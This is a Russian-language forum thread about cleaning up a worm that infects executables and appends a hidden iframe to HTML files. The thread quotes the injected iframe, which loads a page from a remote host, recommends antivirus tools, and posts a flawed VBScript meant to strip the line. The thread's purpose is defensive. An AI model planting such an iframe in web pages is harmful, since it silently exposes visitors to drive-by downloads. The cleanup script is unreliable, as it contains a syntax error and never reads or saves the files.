Вот попалса такой червяк. Поставил автозапуск себе [setup.exe] на все локальные диски....Заражает exe. Сидит в памяти.. Я убил процес..потом del ето вирь..но не ето главное. А Ищо копируетс в %windir%/system32/drivers/spoclsv.exe Блин..но он заражает все html т.к все html у меня зараж. Он дописует в конце PHP: <iframe src="http://[COLOR=Red]ww[/COLOR].viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> Что ето за ссылка? И есть прога которая находила все *.htm\*.html и удаляла етот кусок? ---------------------- сенк всем заранее
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
2 Dimi4, проги скорее всего нету, можешь сам написать, найди исходник программы для поиска файлов, а вырезание строки сам допиши
Стясняюсь спросить: На каком языке исходник искать а то я не очень-то кодер... А может можна там VBs, Js через ActiveX?
Порадовало. Под автозаливом понимается автоматический слив денег со счета холдера на счет владельца трояна. Наверное ты имел ввиду автораспространение, зупачу к примеру.
2 Dimi4, написать можно на чем угодно, если надо на vbs то на сайте wilderwind.narod.ru есть пример вируса на vbs, который сносит все незанятые другими приложениями файлы на диске, его вобщем нетрудно переделать под поиск html файлов и их лечение
Пройдщись хорошенько обновленным антивирусом (нод32 советую) в SafeMode. AVZ - неплохо детектит "хитрые" вирусы. Вкупе с НОДом он попалит большинство поползновений виря. Порченных HTML вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет. Еще лучше - переустанови винду. Вирмейкеры люди хитрые, может ты только верхушку айсберга видешь=)
PHP: Set FSO = CreateObject("Scripting.FileSystemObject") Set wshshell = createobject("WScript.Shell") ' Set TheFolder = FSO.GetFolder("D:\") TheExtension = ".html" TheExtension = UCase(TheExtension) ' Sub WorkWithSubFolders(ByVal AFolder, ByVal TheExtension) On Error Resume Next Dim MoreFolders, TempFolder Set MoreFolders = AFolder.SubFolders For Each TempFolder In MoreFolders WorkWithSubFolders TempFolder, TheExtension Next End Sub ' Dim AFile, TheFiles On Error Resume Next Set TheFiles = AFolder.Files For Each AFile In TheFiles If UCase(FSO.GetExtensionName(AFile.Path)) = TheExtension Then ''' dim oReg set oReg = New RegExp oReg.Global - true oReg.IgnoreCase = true oReg.Pattern = " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> " txt = oReg.Replace(txt, " ") end if Next End Sub ' WorkWithSubFolders TheFolder, TheExtension Такой скрипт подойдет?
работать точно не будет из-за этой строки PHP: oReg.Pattern = " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> " надо каждую кавычку заменить на две: PHP: oReg.Pattern = " <iframe src=""http://ww.viph.net/wuhan/down.htm"" width=""0"" height=""0"" frameborder=""0""> </iframe> "
